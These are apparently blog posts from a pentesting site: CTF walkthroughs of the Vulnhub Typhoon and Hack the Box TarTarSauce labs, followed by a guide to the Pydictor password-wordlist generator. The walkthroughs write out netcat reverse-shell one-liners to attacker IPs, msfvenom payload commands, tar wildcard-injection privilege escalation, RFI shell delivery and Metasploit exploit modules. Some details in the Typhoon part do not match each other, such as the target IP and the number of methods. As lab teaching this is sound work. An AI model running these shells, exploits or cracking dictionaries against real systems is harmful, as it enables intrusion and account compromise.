Typhoon: Vulnhub Walkthrough

Typhoon VM contains several vulnerabilities and configuration errors. Typhoon can be used to test vulnerabilities in network services, configuration errors, vulnerable web applications, password cracking attacks, privilege escalation attacks, post exploitation steps, information gathering and DNS attacks. Prisma trainings involve practical use of Typhoon.

Flag: root-flag

Since there are multiple ways in which we can exploit this machine. Therefore we have used two methods to capture the flag as follows:

Method 1- Using a LOCAL PRIVILEGE ESCALATION SHELL after logging into SSH.

Let’s Begin with the Walkthrough!!

Let’s start off with scanning the network to find our targets IP.

netdiscover

We found our target IP –> 192.168.1.105
Our next motive is to scan the target IP with nmap.
nmap -A 192.168.1.101
The NMAP output shows various open ports: 21(ftp), 22(ssh), 25(smtp), 53(domain), 80(http), 110(pop3), 111(rpcbind), 139(netbios-ssn), 143(imap), 445(netbios-ssn), 631(ipp), 993(ssl/imaps), 995(ssl/pop3), 2049(nfs_acl), 3306(mysql), 5432(postgrespl), 8080(http).
Further we notice that there is a entry /monoadmin/ in robot.txt as it might be useful.

We also noticed that port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1. This could be another way of exploiting this machine. But will see to it later on.

Moving on, Since port 80 is also open. So, we browsed the found directory /mongoadmin/ into the browser. The result displayed is shown in the image. Here we set change database to credentials(84mb). It will display a link of 2 Credentials. Click on it.

Clicking on the 2 Credential link will give us 2 Credentials [username]:typhoon and [password]:789456123 . These credentials might be a great help for further enumeration.

After a sometime, we just strike with a idea WHY NOT USE THE FOUND CREDS TO LOGIN WITH SSH?. Since SSH port 22 is also open.

Than we simply logged in SSH with CREDENTIALS Username:typhoon & Password: 789456123

ssh typhoon@192.168.1.101

Then we checked system information and found out Ubuntu 14.04 is running on target machine. Good thing we were familiar with an exploit for Ubuntu 14.04.

Next we look for an exploit for ubuntu 14.04 using searchsploit. The exploit we have used have highlighted, after that we have copied the exploit 37292.c in the /root/ directory. Executing a Python server to download the file in the target machine.

Afterwards we have downloaded our exploit 37292.c in the /tmp directory. After compilation and granting permissions to the exploit. We have executed it.

Booyeah!! We have got the root access and found our FLAG. We take a look at the content of the file and greeted with a congratulatory message.  

Method 2

Using Tomcat Manager Upload to get the meterpreter and then further establishing a reverse connection to get root access.

Let’s Begin with the Walkthrough!!

Since in Method-1 port scanning, we notice that port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1. So let’s browse the Target IP on port 8080 on the browser.

We are very fimiliar with Tomcat Server Login using manager webapp due to our previous lab experiences. Without wasting time we straight away logged into Tomcat Server using Metasploits Tomcat Manager using the Default credentials for Tomcat Server Login.

[username]:tomcat

[password]:tomcat

Oh Yeah! We have got the meterpreter. After spending a lot of time of enumeration, we found a directory /tab which consist of file script.sh that was owned by root and has FULL Permission. So we thought of inserting a malicious code in script.sh.

 Moving on!! We need to create a bash code using Msfvenom:

msfvenom –p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=1234 R

After that, append the above generated malicious code in the script.sh file.

echo “mkfifo /tmp/vvwjo; nc 192.168.1.109 1234 0

/tmp/vvwjo 2>&1; rm /tmp/vvwjo” > script.sh

Since the malicious code got executed with the script.sh file. Therefore we got a reverse shell on our netcat listener.

Yeah!! We have got the root access and found root-flag. We take a look at the content of the file and greeted with a congratulatory message.

3^rd Method:Exploiting Drupal CMS

Unfortunately on exploring port 80 we didn’t observe any remarkable things, therefore, we try to enumerate web directory with the help of Dirb tool.

dirb http://192.168.1.101

It was wonderful to observe that there was two CMS  as highlighted in the below image.

On exploring /Drupal in the web browser, it put up the following web page which was associated to Drupal cms.

Without wasting must time, we chase towards metasploit and run following module to exploit Drupal cms.

use exploit/unix/webapp/drupal_drupalgeddon2

msf exploit(/unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.1.101

msf exploit(/unix/webapp/drupal_drupalgeddon2) > set targeturi /drupal

msf exploit(/unix/webapp/drupal_drupalgeddon2) > exploit

Booom!! It was terrific moment to see meterpreter session of the target machine. Now for the post exploitation you can follow above methodology which we have already discussed in 1^st method.

4^th Method: Exploiting Lotus CMS

Scroll up and kindly notice the result which we have obtain from the dirb scan, there we had found two CMS. We had already exploit Drupal, now let’s go for next CMS and try to exploit it, if possible

So on exploring /cms in the web browser, it put up the following web page which was associated to Lotus cms.

Without wasting must time, again we chase towards metasploit and run following module to exploit lotus cms.

use exploit/multi/http/lcms_php_exec

msf exploit(multi/http/lcms_php_exec) > set rhost 192.168.1.101

msf exploit(multi/http/lcms_php_exec) > set uri /cms/

msf exploit(multi/http/lcms_php_exec) > exploit

Great, we have own another meterpreter session of the target machine. Now for the post exploitation you can follow above methodology which we have already discussed in 1st method.

Hack the Box: TarTarSauce Walkthrough

Today we are going to solve another CTF challenge “TarTarSauce”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Expert

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of TarTarSauce is 10.10.10.88

Penetrating Methodology

§  Network scanning (Nmap)

§  Directory Enumeration (Drib)

§  Exploiting Wordpress against RFI Vulnerability

§  Spawning TTY shell

§  Check sudoers list permissions

§  Wildcard injection privilege escalation

§  Modify backup file to get root flag

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and services.

nmap -A 10.10.10.88

From given below image, you can observe we found port 80 is open for http service and found robot.txt with 5 disallowed entries.

Let’s navigate to port 80 through a web browser. By exploring IP in the URL box, it puts up following web page as shown in the below image.

We don’t find anything on the webpage, so we run dirb to enumerate the directories. We find a directory called “/webservices/”. We further enumerate “/webservices/” as we don’t find anything in that directory.

dirb http://10.10.10.88

dirb http://10.10.10.88/webservices/

Dirb scan gave us the directory called “/webservices/wp/” that hosts a wordpress site.

We run wpscan to enumerate the themes and plugins and find a vulnerable plugin called “Gwolle Guestbook”. We search for the exploit and find that it is vulnerable to Remote File Inclusion (RFI).

We follow the instructions according to the given POC on exploit-db and use the php-reverse-shell.php available on kali Linux. We copy it to desktop and rename it to wp-load.php to execute our php shell using RFI. We start our python HTTP server to exploit RFI on the target machine.

python -m SimpleHTTPServer 80

We setup our listener using netcat; as soon as we execute our php shell through RFI, we are successfully able to get a reverse shell. We go to “/home” directory and find a folder called “onuma”. We are unable to access “onuma” directory. So we spawn a tty shell using python to check the sudoers list.

python -c “import pty; pty.spawn(‘/bin/bash’)”

We check the sudoers list and find that we can run tar as user “onuma” without any password. Hence we can exploit wild card injection for privilege escalation.

sudo -l

We create an nc reverse shell using msfvenom.

msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.177 lport=4444 R

Now we move to the reverse shell and create a bash file using the nc command and save it as “wp.sh”.

Now tar has the ability to execute command using “--checkpoint-action”. So we created a file named “--checkpoint-action=exec=sh wp.sh” and “--checkpoint=1”.  So that we can execute our command as user onuma.

mkdir data

cd data

echo “mkfifo /tmp/cezbk; nc 10.10.14.177 4444 0

/tmp/cezbk 2>&1; rm /tmp/cezbk” > wp.sh

echo “” > “--checkpoint-action=exec=sh wp.sh”

echo “” > --checkpoint=1

sudo -u onuma /bin/tar cf archive.tar *

We use setup our listener using netcat, as soon as we run the tar command as user “onuma” we get our reverse shell as user “onuma”. Now we change the directory to /home/onuma and find the file called “user.txt” we take a look at the content of the file and find the 1^st flag. After finding the flag we spawn a tty shell using python.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Enumerating through the system we find a file a called a backuperer that has been symlinked to a file a named “backup” in “/usr/local/bin directory”.

We take a look at the content of the file and find that it is a file that creates a gzip archive of files inside “/var/www/html/”. It also checks the integrity of the file after 30 seconds from the creation of the file.

We use a script that takes the advantage of the “sleep” function of the script. As it waits for 30 seconds and then checks the integrity of the file we have 30 seconds to recreate the archive. We use this script here.  After running the script we find the root flag.

Comprehensive Guide on Pydictor – A wordlist Generating Tool

In this article we will explore another dictionary building tool “Pydictor”. These tools are always fun to work with, this is another robust tool perfect for generating custom dictionaries. The thing that stands out most about this tool is the customization options it offers, from the most common to the advance.

Table of Content

§  What is Pydictor

§  Installation

§  Numeric Dictionary

§  Lower Case Alphabet Dictionary

§  Upper Case Alphabet Dictionary

§  Numeral Coupled With Upper Case Alphabet

§  Upper Case Coupled With Lower Case Alphabet               

§  Numeral Coupled With Lower Case Alphabet

§  Combining Upper Case, Lower Case and Numeral

§  Adding Static Head

§  Adding Static Tail

§  Encoding

§  Character Permutation

§  Multiple Character Group Permutation

§  Social Engineering Dictionary

§  Customizing the Social Engineering Dictionary

§  Manipulating Dictionary Complexity Filter

§  Using Plugin

§  Leet Function

What is Pydictor

Pydictor is one of those tools that both novices and pro can appreciate. It is a dictionary building tool that is great to have in your arsenal when dealing with password strength tests. The tool offers a plethora of features which can be used to create that perfect dictionary for pretty much any kind of testing situation.

Installation

Let’s get cracking, the first thing we do is download Pydictor from GitHub and run it using Python. The moment the tool is executed, the running commands are visible to see other optional arguments.

git clone https://github.com/LandGrey/pydictor.git

cd pydictor

python pydictor.py

-base                     [type]

-base Type            Choose from  (d, L, c, dL, dc, Lc, dLc)

                            d     digital                [0 - 9]

                            L     lowercase letters          [a - z]

                            c     capital letters                  [A - Z]

                            dL    Mix d and L                    [0-9 a-z]

                            dc    Mix d and c                    [0-9 A-Z]

                            Lc    Mix L and c                      [a-z A-Z]

                            dLc   Mix d, L and dL            [0-9 a-z A-Z]

-char                      [custom_char]

-chunk                  [chunk1] [chunk2] ...

-extend                [string_or_file]

-plug                     [pid6,ftp,pid8,birthday,pid4,scratch]

-plug arg [arg ...]   birthday  [begin_date] [end_date], date format: [YYYYMMDD]

ftp                                          [keyword1] [keyword2] ...

pid4                                       chinese id card last 4 digit

pid6                                       chinese id card last 6 digit

pid8                                       chinese id card last 8 digit

scratch                                  [url_or_file]

--conf                    [expression_or_file]

-o,--output         [directory]

-tool                      [handler,hybrider,uniqifer,uniqbiner,shredder,comparer,counter,combiner]

--len                      [minlen] [maxlen]

--head                  [prefix_string]

--tail                      [suffix_string]

--encode             [none,sha1,sha512,b64,url,md516,des,rsa,b32,b16,test,sha256,execjs,hmac,md5]

--occur                  [letter] [digital] [special]

--types                 [letter] [digital] [special]

--regex                 [regex]

--level                   [code]

--leet                    [code]

Numeric Dictionary

We are beginning by exploring the option to create a numeric or as described by the tool, digital, dictionary. Let’s start by keeping it simple, only 5 characters long and limited to 0 – 5. We will be using the “—base” option to accomplish this.

The output is saved by default but in this case we will be saving it to “dict.txt”. The storage location will always appear after each execution. The “cat” command is used to view the output in the terminal.

python pydictor.py --len 5 5 -base d -o dict.txt

Alphabet Dictionary

We will be making a dictionary which only holds lower case alphabets, the length of the words will remain to 5 characters.

python pydictor.py --len 5 5 -base L

Upper Case Alphabet Dictionary

We will now generate a dictionary with all the same metrics as earlier with the exception of changing the base option to upper case alphabets.

The result is visible to see.

python pydictor.py --len 5 5 -base c

Numeric Coupled With Upper Case Alphabet

The base options in Pydictor can be used in conjunction with each other, in this instance we will be coupling numeric (d) and upper case alphabets (c). Let’s see what kind of output we get.

python pydictor.py --len 5 5 -base dc

Upper Case Coupled With Lower Case Alphabet

This time it’s going to be both upper and lower case alphabets together.

python pydictor.py --len 5 5 -base Lc

Numeral Coupled With Lower Case Alphabet

Let’s see what we get when we couple numerals with lower case alphabets.

python pydictor.py --len 5 5 -base dL

 

Combining Upper Case, lower Case and Numeral

Now let’s combine all the 3 options that we’ve been playing. We will now combine upper case, lower case and numeral. To keep the output moving quicker we will limit the word length to 3 characters.

python pydictor.py --len 3 3 -base dLc

Adding Static Head

We will now be adding a static head to all the words, note that the head is in addition to the 5 character length that is set. In this instance we will be adding “raj” as a static head in front of all the numerals.

python pydictor.py --len 5 5 --head raj -base d

Adding Static Tail

We will now be adding a static tail to all the words, note that as mentioned in the instance above, the tail is in addition to the 5 character length that is set. In this instance we will be adding “raj” as a static tail at the end of all the numerals.

python pydictor.py --len 5 5 --tail raj -base d

Encoding

Pydictor has an encode function that we can use to encode the words in the dictionary.

It gives us the option to choose from popular encoding algorithms such as Base64, DES, AES, MD5, SHA256, etc. In this instance we will be using Base64 as our algorithm of choice to encode numerals.

In the interest of thoroughness, we will first generate the numerals without encoding and then with encoding.

python pydictor.py --len 5 5 –base d

Now we see what the Base64 encoded output looks like

python pydictor.py --len 5 5 -base d --encode b64

Character Permutation

We can use a permutation of a single word, Pydictor lets us choose a word and churn out as many permutations of it as possible.

python pydictor.py -char raj

Multiple Character Group Permutation

We’ll take Pydictor’s permutation prowess one step further by using the “-chunk” option.

This time we will be giving it multiple group of characters which it will take and churn out as many permutations as possible. It begins in a subtle way by just manipulating one word and then gradually moves on to the others. Notice the progression in the screenshot below.

python pydictor.py -chunk abc ABC 666 . _ @ "'

Social Engineering Dictionary

Pydictor comes with an inbuilt social engineering dictionary builder that lets testers input information from profiling an individual to get a custom tailored dictionary. We run the “help desc” within the social engineering dictionary builder option to see the various defaults it has to offer.

python pydictor.py --sedb

Customizing the Social Engineering Dictionary

“show option” is used within the social engineering dictionary builder to set the various vectors from profiling a target to generate a target specific dictionary. In this instance we will only be inputting the name, birth date, and email and phone number. The vectors are set using the “set” command.

Let’s see what our social engineering dictionary output looks like.

Manipulating Dictionary Complexity Filter

We will be doing two things in this instance, we will be extending a dictionary based on a rule and separating words filtered according to complexity level. The complexity level is set to 3 by default, we will take it up a notch by setting it to 4. The character length is set to a minimum of 1 and a maximum of 6.

We view the latter part of the output.

python pydictor.py -extend raj --level 4 --len 1 6

Using Plugin

Pydictor has plugins built into it by default, we will be suing a plugin that bases its generation on the last 6 digits of a Chinese resident ID card number. We will filter it using the “-occur” function. The occur option lets us defines with the following; letter, numeral and special character, in that order. We will only be looking for results that have numerals occurring 4 times or more in a single string.

python pydictor.py -plug pid6 --types ">=0" ">=4" ">=0"

Leet Function

The leet function can selectively substitute numerals or special characters in the place of alphabets to illustrate; leet turns to L331. We will be using the leet function in conjunction with the occur option and extend function.

This is a more complex ask that we have made from Pydictor than our earlier instances, let’s see what our output looks like.

python pydictor.py -extend /names.txt --leet 0 1 2 11 21 --len 4 16 --occur "<=10" ">0" "<=2"

We hope you enjoyed our little walkthrough of Pydictor. As mentioned earlier, dictionary generators are always a handy thing to have in your arsenal of pentesting tools. This tool is gives the user a lot of advance options which can a bit overwhelming unless the user has a very clear picture of what they want out of this tool.

Don’t be afraid of taking Pydictor for a spin and see what more you can derive out of it.

Stay tuned for more articles on the latest and greatest in hacking.